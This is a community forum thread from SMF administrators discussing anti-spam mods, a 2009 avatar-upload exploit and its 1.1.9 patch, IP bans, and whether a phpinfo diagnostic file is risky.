Quote from: Ziggy on May 17, 2009, 09:46:26 AM

Quote from: JBlaze™ on May 11, 2009, 08:05:23 AM
4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

Regards, JBlaze

I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

I have both mods installed... Go ahead and register if you want... (you arent a spammer right?)  ;)

I tried to register but it said it's waiting for admin approval. I'm sure as heck not a spammer. If it makes all registrations subject to admin approval, it defeats the purpose, I could just set that up in the admin CP. ???

catfished, all it takes is for your username to come up blacklisted. Like I said earlier, sometimes you have to sacrifice functionality for security.

Quote from: catfished on May 19, 2009, 05:01:31 PM

Quote from: Yahmez on May 17, 2009, 07:50:43 PM

Quote from: Ziggy on May 17, 2009, 09:46:26 AM

Quote from: JBlaze™ on May 11, 2009, 08:05:23 AM
4) Install Anti-Spam measures
This is important, as it will save your forum in the long run.

Install the Stop Spammer (http://custom.simplemachines.org/mods/index.php?mod=1547) mod.

• This mod will prevent spam signups as it cross-checks all registrations with the Spam Blacklist.
• Any registrations that check positive will be sent to the Admin approval bin.

Install the reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) mod.

• This mod provides better captcha verification.
• It will stop MOST spam and hackers from registering.

Regards, JBlaze

I would like to try registrating on a forum where both mods are installed.
Who has both mods installed (link)?

I have both mods installed... Go ahead and register if you want... (you arent a spammer right?)  ;)

I tried to register but it said it's waiting for admin approval. I'm sure as heck not a spammer. If it makes all registrations subject to admin approval, it defeats the purpose, I could just set that up in the admin CP. ???

I just authorized you.... But I uninstalled the re-capcha in favor of smf's capcha.

Quote from: JBlaze on May 19, 2009, 05:03:25 PM
catfished, all it takes is for your username to come up blacklisted. Like I said earlier, sometimes you have to sacrifice functionality for security.

OK but I seriously doubt the username "catfished" is blacklisted anywhere. It's certainly not a common username, in fact I've never ran across anyone else using it and I've been using it since 1999. I have never done anything that would warrant blacklisting me. :o

It seems like that stop spammers mod blocks any username.

Quote from: Yahmez on May 19, 2009, 05:25:10 PM

I just authorized you.... But I uninstalled the re-capcha in favor of smf's capcha.

Yeah, I just noticed that, thanks but I was simply testing the registration with the mods as you offered to the other op. I still don't understand why it blacklisted me in the first place.

Quote from: catfished on May 19, 2009, 05:28:31 PM

Quote from: JBlaze on May 19, 2009, 05:03:25 PM
catfished, all it takes is for your username to come up blacklisted. Like I said earlier, sometimes you have to sacrifice functionality for security.

OK but I seriously doubt the username "catfished" is blacklisted anywhere. It's certainly not a common username, in fact I've never ran across anyone else using it and I've been using it since 1999. I have never done anything that would warrant blacklisting me. :o

Relax catfished. You did not come up as a spammer. I have it set up for an admin to approve all accounts, spammer or not. I still use the anti spam measures though because it means I do not have manually check each new member against the stop forum spam database.

Quote from: babjusi on May 19, 2009, 05:30:47 PM
It seems like that stop spammers mod blocks any username.

Yeah, that's kind of what I thought so then we can just enable admin approval in the admin CP to do the same thing. ???

Thank you for this, I was recently exploited with the avatar glitch, and lost my data, luckily I had backups :)

Quote from: ScopeXL on May 19, 2009, 08:08:10 PM
Thank you for this, I was recently exploited with the avatar glitch, and lost my data, luckily I had backups :)

Glad you got it sorted. That is why we stress "Backup, backup, backup!" :)

I've now had krisbarteo register on 3 sites I help out with. In all three cases, it just signed up, did the avatar thing and no damage was done to the files on the site. Deleted the accounts. And because the trend seems to be registering under krisbarteo, I simply went to Admin > Registration > Set Reserved Names and added krisbarteo. I realize it's a shot in the dark as the user name for this exploit could change, but so far krisbarteo is the username being registered. Also banned the IP as that seems to be consistent.

Yeah, strangely it seems this is pretty much completely out of one static IP address. I don't really understand why someone would do that, but hey - I'm not a script kiddie myself :D

That is all ok, but will the patch release soon?
I'm sure we all waiting for it... :D
And we know you testing it, but....

Yes, the patch should be out soon. It is being tested for bugs at the moment.

And here it is!

http://www.simplemachines.org/community/index.php?topic=311899.msg2069703#msg2069703

Another way to help protect against hacks is installing SMF 1.1.9.

Patch installed without problems.
But...
See the hackcodes have not been removed by way of this patch!
Somewhere thought to have read that also would be done buy this; some lazy admins without a recent backup (laike me  :-[) have waited for this.
Now suppose I need still manual replace all 1.1.9 php-files by new (clean) ones?

Or is the code harmless by using version 1.1.9 now and I can just let it stay?

Thanks SMF team. I upgraded my forum to 1.1.9 successfully and then looked and found that krisbarteo is a member.  I'm unaware if there are things he left on my site. Can you recommend any further actions besides deleting this member?

Im upgraded too, and have no problems... :)
Glad that this is over now...

@Deal - Think that deleting will be just fine... :D

Hi

Upgraded too and have no problems - thanks to all


Is it still recommended that attachments are kept in disabled mode at all times

No, you should be safe to use them again ;)

Stupid question, but does this update also cover things like the ultimate profile and gallery mods?

Upgrade have no touch with mods, so it might happen that some mods cant work after upgrading, but you can easy correct them by manually adding codes that are missing...

This update is a generic patch for all 3 branches of SMF. As long as it installs, you are covered.

Oh, I installed the update maybe 2min. after it went live yesterday. It installed without a hitch which I was extremely happy about too. I just haven't gotten around to changing permissions for things yet and I was curious about the mods side of things.

Thanks for the replies by the way. :)

Can anyone help me I have been attacked by this evil thing, pm please

Quote from: joe90 on May 22, 2009, 05:06:56 AM
Can anyone help me I have been attacked by this evil thing, pm please

http://www.simplemachines.org/community/index.php?topic=307717.0
http://www.simplemachines.org/community/index.php?topic=309741.0

Thanks

great job workout now

Good information here.  Thanks for taking the time to post it.

This has been very interesting reading. This person had tried to
get themselves registered on my forum, but fortunately I was lucky.

I had banned the IP sometime ago, not knowing it was this one, until
earlier this week. Where I consider myself extremely lucky is that I require
all my members to join using a 'real' email address ie; an email assigned
to them by their Internet Service Provider, from the word go.

I also had the 'Restrict Email Providers on Registration' mod installed, as
more of these 'free' email addresses became known I would just add them
to the modification and ban the member using that email address. That
particular modification is one of the best there is :)

Like they wouldn't realise as the request for a IP email address is in big bold
red letters on the registration agreement, but as we all know some people
will try anything once. It is funny of course, most never contact admin regarding
being banned for this reason  :P On our forum we are well aware of what these
members are after, and it isn't to participate, it is solely to copy and paste what
we have onto the forum they do participate on  :P

What I have also started to do, about the middle of the week, was as I
checked the 'guests' and they were from certain parts of the world. I started
to go and use the 'IP Deny Manager' in my cPanel. Not that I don't want 'guests'
but my forum is only for people from my country and would have nothing of
interest to any others.

Edit: Silly old me, thank you for everyone's assistance and information they
have shared during this, what would have been a dreadful time for some of you.
The SMF community is a wonderful place to be a part of :)

Quote from: squad on May 22, 2009, 11:54:20 AM
my forum is only for people from my country and would have nothing of
interest to any others.

What about your country man living outside your country, he also get ban?

So does this means that 1.x SMF's can't allow avatars to be uploaded ever?

Quote from: leesw on May 22, 2009, 05:48:44 PM
So does this means that 1.x SMF's can't allow avatars to be uploaded ever?

1.1.8 = no avatar
1.1.9 = good to go  ;)

Quote from: Kenny01 on May 22, 2009, 12:03:24 PM

Quote from: squad on May 22, 2009, 11:54:20 AM
my forum is only for people from my country and would have nothing of
interest to any others.

What about your country man living outside your country, he also get ban?

Well not necessarily, if they are travelling they can still log in.

What my forum is designed for you need to be living and a resident to participate
in the things on my forum. I specialise in promoting Competitions or Sweepstakes
as they are called in other countries. So it is pointless if you are living in any other
country to enter.

We have found it has saved heaps of trouble by requiring the use of IP email addresses,
especially in this drama of the last week or so :)

Quote from: squad on May 22, 2009, 11:54:20 AM
This has been very interesting reading. This person had tried to
get themselves registered on my forum, but fortunately I was lucky.

I saw quite a lot of forums now where he did register but no harm was done. So because he was in, doesn't nessescarily means you've been hacked.

He register and come back later to hack, so ban him fast before it's too late.

This is my first post here.  I am a mod on our forum but we have been given a number of admin functions to help with keeping the board up.

We were hit by this avatar attach by this Kristos person.  He was nuked.  We have upgraded our software to the newest version but we are still having problems with lost avatars and errors.

None of our template files seemed to have been updated with the new upgrade.   I wonder if this is part of the problem?

We thought the upgrade would solve it, but that didn't happen.  If someone would be so kind to point me towards the info that would help us fix this completely, I would really appreciate it. 

Go for the large upgrade http://download.simplemachines.org/ that will overwrite all the mess left behind and give you a healthy forum.

Quote from: Kenny01 on May 24, 2009, 10:11:56 AM
Go for the large upgrade http://download.simplemachines.org/ that will overwrite all the mess left behind and give you a healthy forum.

Thank you. :)

(QUOTE FROM JBlaze on: May 11, 2009, 08:05:23 AM)


2) Ask your host if their servers/software are up to date

•Most hacks are effective when the host has outdated software such as old versions of PHP, Apache and MySQL for example.
•Don't be scared to ask your host if their side of security is up to date. It is their responsibility to help protect you as well.
•Check your hosts versions of MySQL, PHP, Apache, etc. Make a file called phpinfo.php with the following content:

<?php
phpinfo();
?>

Place that file into your root directory and execute it by navigating to it directly
Ex. http://www.mysite.com/phpinfo.php
(END QUOTE)

That is also a dangerous file, if another user, esp. a hacker can find that file, that is all he/she needs to hack into your site, it gives the correct information for it, JUST FYI EVERYONE!

No it doesn't. Assuming your server is set up properly it's no more dangerous than telling people what system you run for your desktop. 

...and as a follow up-  simply run phpinfo, and then delete it or rename it after you are through using it. No problem at all.

I'm a little confused and not big on time to be able to spend hours reading to get info.  Can someone please give me link to upload the bots to stop whoever s trying to register on the site from south africa or braxil as each IP number is different and I have banned all the IP triggers as new ones come in.

I need to know
1)  what to upload

2)  where do I upload it. on SMF same place as index or in its own folder.

3)  does it just work once done that, or is there a simple manual that explains in simple language for people like me on what to do.  I like SMF because it is easy to control.

I also haven't updated mine yet as I'm worried I may not know how to do it and cancel out everything on the board.  Is htere simple language for that also.?
My forum is private and by approved registration only, so hope none of those IP have been able to get in.
thanks
Sery

THIS SHOULD PROBABLY BE STICKIED, THIS IS HELPFUL AND IMPORTANT!

I ended up doing the right thing and upgraded my forum and it came up as a major error,  changed al the permissions to 777 and still nothing, so ended up just uploading the real old forum I still had backed up and it came back and worked.  I knew there was a reason why i didnt want to upgrade, it stuffs up and even though I followed the information on uploading:
http://docs.simplemachines.org/index.php?topic=340

it didn't work for me.  sigh....  it sucks being an amateur!!!

Quote from: busterone on May 26, 2009, 09:52:46 PM
...and as a follow up-  simply run phpinfo, and then delete it or rename it after you are through using it. No problem at all.

yeah, and that was the main thing, if they know about your phpinfo file, they, if they are good enough, can use it against you...

I always keep it on my local machine (phpinfo file) and put it onto the server to view the info, then erase it from the server..

Quote from: kcmartz on May 27, 2009, 11:19:58 AM
THIS SHOULD PROBABLY BE STICKIED, THIS IS HELPFUL AND IMPORTANT!

It was stickied.


As for phpinfo(), as Antechinus said, it is no more dangerous than just showing what you server runs. Even though a good hacker will inject a phpinfo file of his/her own...

Would someone please tell me the difference between reCaptcha and image verification? And is the new reCaptcha better than what SMF had a couple of years ago?

Quote from: leesw on May 28, 2009, 11:59:18 AM
Would someone please tell me the difference between reCaptcha and image verification? And is the new reCaptcha better than what SMF had a couple of years ago?

SMF uses images called "captcha" images to help prevent spam. They are simple, yet effective.

reCAPTCHA is a mod for SMF that increases the complexity of the captcha and makes it harder for spambots.

Quote from: JBlaze on May 28, 2009, 01:14:33 PM
SMF uses images called "captcha" images to help prevent spam. They are simple, yet effective.

reCAPTCHA is a mod for SMF that increases the complexity of the captcha and makes it harder for spambots.

The thing with SMF's built in capcha is that ALL of the images have the exact same letters. If a spammer realizes this then ALL SMF boards (with only built in capcha) are compromised. I'm not sure why SMF made it this way....
EDIT: Oops!  I was wrong... seems to be showing variation now.

Just out of interest would a forum have been protected against this attack if it only permitted the use of preinstalled Avatars?

Quote from: joe90 on June 10, 2009, 11:02:53 AM
Just out of interest would a forum have been protected against this attack if it only permitted the use of preinstalled Avatars?

I'm not absolutely sure, but way I've seen that hack been done, I'd say yes. The essential parts of that hack could not have been executed if avatar uploads were disabled.

It has been 5 days since I installed the reCAPTCHA. Now, there is no single user registration in last 5 days. All Previous registrations seem to be done by the spambots. Thanks JBlaze. :)

Quote from: Mayur on July 27, 2009, 06:53:52 PM
It has been 5 days since I installed the reCAPTCHA. Now, there is no single user registration in last 5 days. All Previous registrations seem to be done by the spambots. Thanks JBlaze. :)

Glad I could help :)

Sorry to post in a old topic, but GoDaddy has apache 1.3.33 I think, isn't that a Old Version?

Considering I use Apache 2.2, yea I'd say so...

GoDaddy fails, that's all there is to it.

Wow, that really is old. Evening mine is using 2.2.14.

And I've seen [unverified] reports that some GoDaddy servers are running MySQL 4.0.x... Not necessarily a security problem, but I wonder what really, really old versions of other software are running there.

I have disable uploading of anything in the forum includes Avatar. But I notice users are not comfortable with that. Is there away I can navigate around this challenges without risking hacking of the forum?
I am thinking of using a different domain where I can use its folder is instoring attachments and avatars, I don't know if this would solve it or is it thesame thing? Please advice what is the way out.

I suggest to make a user gropu wich is users below (for example) 10 posts. For them you can disable uploading avatars, attachments etc (but you can enable them to select avatars from server), and for other grups you can enable this futures. Ive did this at my forum, and have no problems.
Of course, you should always use the latest version of smf.

This topic is 15 months old  O:)

As far as I am aware, there is no current risk associated with allowing the uploading of attachments and avatars.

 Dzonny, what are the steps to do that?

Paul_Pauline, I am using SMF 1.1.11 is that covered?

The official opinion, as far as I am aware, is that there are no know security issues with 1.1.11   :)

Paul_Pauline, youre right, but however i think that better is to be careful, and not to enable all users to upload everything they want to server :)

I am glad about these two opinions I am getting. I will enable the attachments and avatars upload, having assured there is no security challenges involved.
Dzonny, how would I set the option you suggested?

Make a new group in admin panel, and set persmissions to it, so it suit the situation.
See links below for more informations:
Membergroups (http://docs.simplemachines.org/index.php?board=59.0;sort=subject)
Permissions (http://docs.simplemachines.org/index.php?board=60.0;sort=subject)

Thanks this is helpful and able to achieve that.

Hi to all.
Im sorry if I revived an old topic.

Im a new user of SMF and currently experiencing some sort of unwanted registration to my forum.
There been registrations that coming from same IP. I would not mind it logging in same IP but they never post any.
What I did is put that IP in banned list.
What should I do in the future to prevent this unwanted signing up/registrations.
Im using SMF 1.1.11, do I need to upgrade it/modify
Thanks a lot

Hello there.

Youre using the latest stable version of smf, so there is no need to upgrade anything.
What u can do, is to install some of Spam prevent mods from our mods site, if problems is bots.
However, if problem is humans, then all you can do is to ban them and hope that they will not register again.

Regards.

Thanks. I'll do that.

At the moment no more registration from that IP.

Regards

I've seen MANY more "members" signing up that are spammers. I had to set the site to manual approval. I now check each one against Stop Spammer's list. However is there a rule of thumb with that? I asked at Stop Spammer and they really couldn't give me an answer. I usually check the e-mail address and the username. If either have any hits I reject it. However on the I.P. address it is possible that the I.P. is a community one right? Any tips would be appreciated. Dame Spammers!

You can install additional anti spam measures such as the httpBL mod
http://custom.simplemachines.org/mods/index.php?mod=2155 (http://custom.simplemachines.org/mods/index.php?mod=2155)
or the Bad Behavior Mod
http://custom.simplemachines.org/mods/index.php?mod=2502 (http://custom.simplemachines.org/mods/index.php?mod=2502)

There's also a mod that automates the checks from Stop Forum Spam, that you have apparently been doing manually.

Damn, this topic is still around? :o

Quote from: JBlaze on January 20, 2011, 01:10:54 AM
Damn, this topic is still around? :o

It was unsticked, not removed.

If i take stop spammer and re captca on smf 1.1.13, it Compatible ?

thank's before